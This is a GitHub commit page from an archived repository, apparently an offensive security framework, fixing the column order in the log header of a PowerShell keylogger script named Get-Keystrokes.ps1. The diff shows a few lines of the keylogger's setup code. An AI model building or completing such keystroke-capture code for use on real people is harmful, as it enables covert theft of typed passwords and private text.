Skip to content
This repository has been archived by the owner on Jan 21, 2021. It is now read-only.

Commit

Permalink
Merge pull request #68 from hydrajump/get-keystrokes-headings-reorder
Browse files Browse the repository at this point in the history
Fix for headings in wrong order
  • Loading branch information
obscuresec committed May 11, 2015
2 parents 5b1a775 + 0045054 commit 2153a0a
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Exfiltration/Get-Keystrokes.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ function Get-Keystrokes {
$Initilizer = {
$LogPath = 'REPLACEME'

'"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode
'"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode

function KeyLog {
[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null
Expand Down

0 comments on commit 2153a0a

Please sign in to comment.